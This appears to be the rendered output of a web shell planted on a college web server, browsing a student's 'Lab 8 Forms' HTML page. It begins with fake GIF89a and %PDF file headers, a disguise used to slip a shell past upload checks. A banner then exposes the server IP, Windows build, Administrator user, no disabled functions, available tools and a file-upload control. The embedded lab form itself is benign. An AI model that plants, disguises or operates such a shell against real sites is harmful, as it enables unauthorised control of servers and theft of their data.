GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST1022/Labs/Lab08/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Lab 8 Forms - Jim Martinson</title> <meta charset="utf-8"> <link href="Lab12.css" rel="stylesheet" type="text/css"> </head> <body> <h1>Lab 8 Forms - Jim Martinson</h1> <table class="center"><tr><td> <form action="https://cst.ridgewater.edu/Tools/FormEcho/?get=URL+query&ooga=booga" method="post"> <input type="hidden" name="student" value="Jim Martinson"> <label>Favorite passtime</label><input type="text" name="favorite" value=""><br> <label>Gender</label> <input type="radio" name="gender" id="genderF" value="Female"><label for="genderF">Female</label> <input type="radio" name="gender" id="genderM" value="Male"><label for="genderM">Male</label> <input type="radio" name="gender" id="genderU" value="Unknown"><label for="genderU">Unknown</label> <br> <label for="chkM">Days of the week</label><input type="checkbox" name="M" id="chkM" value="M">M <input type="checkbox" name="T" value="T">T <input type="checkbox" name="W" value="W">W <input type="checkbox" name="H" value="H">H <input type="checkbox" name="F" value="F">F<br> <div class="center"><input type="submit" value="Send data"></div> </form> </td></tr></table> </body> </html>